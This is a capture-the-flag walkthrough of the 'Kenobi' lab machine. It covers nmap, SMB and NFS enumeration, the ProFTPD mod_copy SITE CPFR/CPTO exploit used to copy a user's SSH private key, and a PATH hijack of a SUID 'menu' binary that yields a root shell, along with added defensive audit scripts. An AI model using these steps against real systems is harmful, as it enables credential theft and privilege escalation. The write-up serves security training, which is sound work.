![[Pasted image 20250622133724.png]]
### Scan the machine with nmap, how many ports are open?
```bash
root@ip-10-10-156-119:~# sudo nmap -sS 10.10.11.192 -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 18:49 BST
Nmap scan report for 10.10.11.192
Host is up (0.00056s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
37999/tcp open unknown
40771/tcp open unknown
44585/tcp open unknown
50267/tcp open unknown
MAC Address: 02:31:26:D2:2E:4B (Unknown)
```
```bash
root@ip-10-10-156-119:~# nmap -sC -sV 10.10.11.192 -p 21,22,80,111,139,445,2049
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 19:05 BST
NSOCK ERROR [11.9880s] mksock_bind_addr(): Bind to 0.0.0.0:389 failed (IOD #11): Address already in use (98)
Nmap scan report for 10.10.11.192
Host is up (0.00053s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 33397/tcp6 mountd
| 100005 1,2,3 42356/udp mountd
| 100005 1,2,3 50267/tcp mountd
| 100005 1,2,3 58743/udp6 mountd
| 100021 1,3,4 44585/tcp nlockmgr
| 100021 1,3,4 45953/udp6 nlockmgr
| 100021 1,3,4 46505/tcp6 nlockmgr
| 100021 1,3,4 55109/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 02:31:26:D2:2E:4B (Unknown)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2025-06-22T13:05:15-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-06-22T18:05:15
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.41 seconds
```
```bash
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <IP>
```
### Using the nmap command above, how many shares have been found?
3 shares
```bash
root@ip-10-10-156-119:~# nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.11.192
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 18:52 BST
Nmap scan report for 10.10.11.192
Host is up (0.00024s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 02:31:26:D2:2E:4B (Unknown)
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.11.192\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.11.192\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.11.192\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
```
### Once you're connected, list the files on the share. What is the file you can see?
log.txt
```bash
root@ip-10-10-156-119:~# smbclient //10.10.11.192/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 11:49:09 2019
.. D 0 Wed Sep 4 11:56:07 2019
log.txt N 12237 Wed Sep 4 11:49:09 2019
9204224 blocks of size 1024. 6877092 blocks available
smb: \>
```
---
### What port is FTP running on?
21
---
Your earlier nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program numbers into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number it's prepared to serve.
In our case, port 111 gives us access to a network file system (NFS).
`nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <IP>`.
### What mount can we see?
/var
```bash
root@ip-10-10-156-119:~# nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.11.192
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 19:01 BST
Nmap scan report for 10.10.11.192
Host is up (0.00014s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836516.0 6877112.0 22% 16.0T 32000
MAC Address: 02:31:26:D2:2E:4B (Unknown)
```
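The `/var *` line in the nfs-showmount result above means the export carries no client restriction at all, which is why a mount from any host succeeds. The Python script below is an added example, not part of this writeup or the room: it parses lines in the `/etc/exports` format (an exported path followed by `host(option,option)` entries) and flags exports open to every host or configured with `no_root_squash`. The configuration it checks is constructed for the example; its first line mirrors the export found on the target.

```python
"""Audit /etc/exports-style NFS export lines for client restrictions.

Added example, not from the original writeup. Parses lines in the
/etc/exports format: an exported path followed by zero or more
host(option,option) entries. Flags exports that any host can mount
(the "/var *" case found by nfs-showmount) and exports that keep
remote root as uid 0 (no_root_squash).
"""
import re

# Constructed sample; the first line mirrors the export found on the target,
# the rest are hardened variants for comparison.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample for this example)
/var *
/srv/share 10.10.0.0/16(rw,sync,no_root_squash)
/srv/data 10.10.11.5(ro,sync,root_squash) 10.10.11.6(ro,sync)
"""

# host, optionally followed by (options); an empty host field means every client
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return [(path, [(host, [options]), ...]), ...] for each export line."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        tokens = line.split()
        path, clients = tokens[0], []
        for tok in tokens[1:]:
            m = CLIENT_RE.match(tok)
            if not m:
                continue                      # malformed entry, skip it
            host = m.group(1) or "*"          # "(rw)" with no host means every client
            opts = m.group(2).split(",") if m.group(2) else []
            clients.append((host, opts))
        if not clients:                       # a bare path also exports to everyone
            clients.append(("*", []))
        exports.append((path, clients))
    return exports


def audit_exports(text):
    """Return (path, host, reason) findings for risky export entries."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            if host == "*" or host.startswith("*."):
                findings.append((path, host, "wildcard-host"))
            if "no_root_squash" in opts:
                findings.append((path, host, "no_root_squash"))
    return findings


if __name__ == "__main__":
    for path, host, reason in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:<12} {host:<16} {reason}")
```

Run against a real `/etc/exports` by passing the file's contents to `audit_exports`; the fix for a wildcard finding is to restrict the export to the specific hosts or subnet that need it, and to leave `root_squash` (the default) in place so a remote root cannot read files as uid 0 over the mount.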
---
Let's get the version of ProFtpd. Use netcat to connect to the machine on the FTP port.
### What is the version?
1.3.5
```bash
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
```
We can use searchsploit to find exploits for a particular software version. Searchsploit is basically just a command-line search tool for exploit-db.com.
### How many exploits are there for the ProFTPd running?
4
![[Pasted image 20250622131243.png]]
---
You should have found an exploit from ProFTPD's `mod_copy` module.
The mod_copy module implements **SITE CPFR** and **SITE CPTO** commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.
We know that the FTP service is running as the `Kenobi` user (from the file on the share) and an SSH key has been generated for that user.
We're now going to copy Kenobi's private key using SITE CPFR and SITE CPTO commands.
```bash
root@ip-10-10-156-119:~# nc 10.10.11.192 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.11.192]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
```
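As an added detection-side example (not part of the original writeup), the script below reads a constructed FTP command transcript in the same shape as the netcat exchange above (client lines are raw commands, server lines start with a three-digit reply code) and flags `SITE CPFR`/`SITE CPTO` issued before any `230` login reply, plus copies whose source or destination lies outside the directory FTP users are expected to touch. The transcript, the `allowed_root` value and every reply text after the banner are constructed for the example.

```python
"""Flag ProFTPD mod_copy abuse in an FTP command transcript.

Added example, not from the original writeup. Input is a constructed
transcript in the shape of the netcat exchange above: client lines are raw
FTP commands, server lines start with a three-digit reply code. Checks:
SITE CPFR/CPTO before a 230 (login accepted) reply, and CPFR/CPTO pairs
whose source or destination lies outside the expected FTP root.
"""
import re

# Constructed transcript: the first half mirrors the exchange above, the
# second half is a legitimate copy by an authenticated (anonymous) user.
SAMPLE_TRANSCRIPT = """\
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.11.192]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
USER anonymous
331 Anonymous login ok, send your complete email address as your password
PASS guest@example
230 Anonymous access granted, restrictions apply
SITE CPFR /srv/ftp/pub/readme.txt
350 File or directory exists, ready for destination name
SITE CPTO /srv/ftp/pub/readme.bak
250 Copy successful
"""

REPLY_RE = re.compile(r"^(\d{3})[ -]")
SITE_COPY_RE = re.compile(r"^SITE\s+(CPFR|CPTO)\s+(\S+)", re.IGNORECASE)


def analyse_transcript(text, allowed_root="/srv/ftp/"):
    """Return (line_no, reason, detail) findings for a transcript."""
    findings = []
    authenticated = False
    pending_src = None                    # path named by the last CPFR
    for n, line in enumerate(text.splitlines(), 1):
        reply = REPLY_RE.match(line)
        if reply:
            if reply.group(1) == "230":   # server accepted the login
                authenticated = True
            continue
        m = SITE_COPY_RE.match(line.strip())
        if not m:
            continue
        verb, path = m.group(1).upper(), m.group(2)
        if not authenticated:
            findings.append((n, "unauthenticated-site-copy", f"{verb} {path}"))
        if verb == "CPFR":
            pending_src = path
            continue
        # CPTO completes the copy, so judge source and destination together
        src = pending_src or "<no CPFR>"
        if not (src.startswith(allowed_root) and path.startswith(allowed_root)):
            findings.append((n, "copy-outside-ftp-root", f"{src} -> {path}"))
        pending_src = None
    return findings


if __name__ == "__main__":
    for line_no, reason, detail in analyse_transcript(SAMPLE_TRANSCRIPT):
        print(f"line {line_no:>2}: {reason:<26} {detail}")
```

The transcript check is for captured sessions or a command-level log; on the server itself the fix is to remove or disable `mod_copy`, since nothing else stops an unauthenticated client from issuing these two commands on an affected build.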
We've now copied Kenobi's private key to the `/var/tmp` directory.
Let's mount the `/var` export, which contains `/var/tmp`, on our machine.
```bash
mkdir /mnt/kenobiNFS
mount <IP>:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
```
/mnt/kenobiNFS
```bash
root@ip-10-10-156-119:/# mkdir /mnt/kenobiNFS
root@ip-10-10-156-119:/# mount 10.10.11.192:/var /mnt/kenobiNFS
root@ip-10-10-156-119:/# ls -la /mnt/kenobiNFS/
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 Jun 22 19:20 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 12 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root lxd 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 26 2019 mail
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 29 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Jun 22 19:17 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
```
We now have a network mount on our deployed machine. We can go to `/var/tmp`, get the private key, and then log in to Kenobi's account.
```bash
root@ip-10-10-156-119:~/Desktop# cp /mnt/kenobiNFS/tmp/id_rsa .
root@ip-10-10-156-119:~/Desktop# sudo chmod 600 id_rsa
root@ip-10-10-156-119:~/Desktop# ssh -i id_rsa kenobi@10.10.11.192
The authenticity of host '10.10.11.192 (10.10.11.192)' can't be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
```
### What is Kenobi's user flag (/home/kenobi/user.txt)?
```bash
kenobi@kenobi:~$ cd /home/kenobi
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
d0b0...
```
### Let's first understand what SUID, SGID, and Sticky Bits are
| **Permission** | **On Files** | **On Directories** |
| -------------- | ---------------------------------------------------------------- | --------------------------------------------------------- |
| SUID Bit | User executes the file with permissions of the _file_ owner | - |
| SGID Bit | User executes the file with the permission of the _group_ owner. | File created in directory gets the same group owner. |
| Sticky Bit | No meaning | Users are prevented from deleting files from other users. |
SUID bits can be dangerous. Some binaries, such as `passwd`, need to run with elevated privileges (since they reset your password on the system); however, other custom files that have the SUID bit set can lead to all sorts of issues.
To search a system for these types of files, run the following:
`find / -perm -u=s -type f 2>/dev/null`
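The find command lists every SUID file; the next step a reviewer takes is to compare that list with what the distribution is expected to ship, so a stray binary stands out on its own. The Python script below is an added example, not part of the original writeup: it walks a directory tree for SUID/SGID regular files and reports the ones missing from a baseline. The baseline set and the temporary demo tree it builds are constructed for the example.

```python
"""Report SUID/SGID files that are not on an expected baseline.

Added example, not from the original writeup. find_setid_files() does what
the find command above does (regular files with the SUID or SGID bit set);
audit_setid() subtracts a baseline of binaries the distribution normally
ships with those bits, so a custom binary such as /usr/bin/menu is the
only thing left. The baseline and the demo tree are constructed.
"""
import os
import stat
import tempfile

# Constructed baseline: the stock entries from the find output in this
# writeup, without the custom binary.
BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec", "/bin/su",
    "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
}


def find_setid_files(root):
    """Return {"/path/relative/to/root": mode} for SUID or SGID regular files."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)           # lstat: do not follow symlinks
            except OSError:
                continue                      # unreadable entry, like 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                logical = "/" + os.path.relpath(full, root)
                found[logical] = st.st_mode
    return found


def audit_setid(root, baseline=BASELINE):
    """Return sorted set-id files under root that the baseline does not expect."""
    return sorted(p for p in find_setid_files(root) if p not in baseline)


def build_demo_tree():
    """Create a constructed tree: two SUID files (one expected, one not) and
    one ordinary executable. Returns the tree root."""
    root = tempfile.mkdtemp(prefix="setid-demo-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("passwd", 0o4755), ("menu", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    print("set-id files:", sorted(find_setid_files(demo_root)))
    print("not in baseline:", audit_setid(demo_root))   # ['/usr/bin/menu']
```

On a real host, call `audit_setid("/")` with a baseline taken from a freshly installed system of the same release; anything it reports is either a package that legitimately needs the bit (add it to the baseline) or a candidate for exactly the kind of review the next question asks for.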
### What file looks particularly out of the ordinary?
`/usr/bin/menu`
```bash
kenobi@kenobi:~$ find / -type f -perm -u=s 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
```
### Run the binary, how many options appear?
3
```bash
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
```
```bash
# 1st option
curl -I localhost
# 2nd option
uname -r
# 3rd option
ifconfig
```
`strings` is a command on Linux that looks for human-readable strings in a binary.
```bash
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# whoami
root
```
We created a file called `curl` that launches `/bin/sh`, gave it executable permissions and then put its directory at the front of our PATH. This meant that when the `/usr/bin/menu` binary ran, it used our PATH variable to find the "curl" binary... which is actually our script starting `/bin/sh`. Since the menu binary runs as root, it runs our shell as root!
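The hijack works because the shell started by `menu` walks PATH left to right and takes the first executable called `curl` it finds. The Python script below is an added example, not part of the original writeup: it builds two constructed directories, resolves the bare name `curl` the way the shell does and the way a hardened privileged program should (a fixed list of trusted directories, ignoring the caller's PATH), and reports PATH entries that any user can write to. The directory names and the `TRUSTED_DIRS` list are assumptions for the example.

```python
"""Show PATH lookup order and a hardened alternative for privileged programs.

Added example, not from the original writeup. resolve_via_path() mimics what
the shell behind a relative command such as "curl -I localhost" does: the
first executable named curl in PATH order wins. resolve_trusted() is what a
SUID program should do instead: look only in a fixed list of trusted
directories, never the caller's PATH. writable_path_entries() is the audit
side: PATH directories any user can write to. TRUSTED_DIRS and the demo
directory layout are assumptions for the example.
"""
import os
import stat
import tempfile

TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")   # assumption


def resolve_via_path(cmd, path):
    """First executable called cmd along path (PATH order), or None."""
    for d in path.split(os.pathsep):
        cand = os.path.join(d or ".", cmd)    # empty entry means current dir
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def resolve_trusted(cmd, trusted_dirs=TRUSTED_DIRS):
    """Resolve cmd inside trusted_dirs only; the environment's PATH is ignored."""
    return resolve_via_path(cmd, os.pathsep.join(trusted_dirs))


def writable_path_entries(path):
    """PATH entries a non-owner could plant a binary in: world-writable or empty."""
    risky = []
    for d in path.split(os.pathsep):
        if d == "":
            risky.append("")                  # empty entry = current directory
            continue
        try:
            st = os.stat(d)
        except OSError:
            continue
        if st.st_mode & stat.S_IWOTH:
            risky.append(d)
    return risky


def build_demo():
    """Constructed layout: <base>/usr/bin/curl (trusted) and a world-writable
    <base>/tmp holding a planted curl. Returns (sysdir, tmpdir)."""
    base = tempfile.mkdtemp(prefix="path-demo-")
    sysdir = os.path.join(base, "usr", "bin")
    tmpdir = os.path.join(base, "tmp")
    os.makedirs(sysdir)
    os.makedirs(tmpdir)
    os.chmod(tmpdir, 0o1777)                  # world-writable, sticky, like /tmp
    for d in (sysdir, tmpdir):
        p = os.path.join(d, "curl")
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(p, 0o755)
    return sysdir, tmpdir


def demo():
    """Run the comparison on the constructed layout and return the results."""
    sysdir, tmpdir = build_demo()
    hijack_path = tmpdir + os.pathsep + sysdir    # same shape as PATH=/tmp:$PATH
    return {
        "sysdir": sysdir,
        "tmpdir": tmpdir,
        "via_path": resolve_via_path("curl", hijack_path),     # the planted one
        "trusted": resolve_trusted("curl", (sysdir,)),         # the real one
        "writable": writable_path_entries(hijack_path),        # [tmpdir]
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:<9} {value}")
```

The two resolvers are the whole difference between the vulnerable and the hardened binary: a privileged program that calls `system()` with a bare command name inherits whatever PATH the unprivileged caller set, whereas one that uses absolute paths (or resets PATH to a fixed trusted value before running anything) cannot be redirected by a writable directory the caller controls.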
```bash
# cat root.txt
177b...
```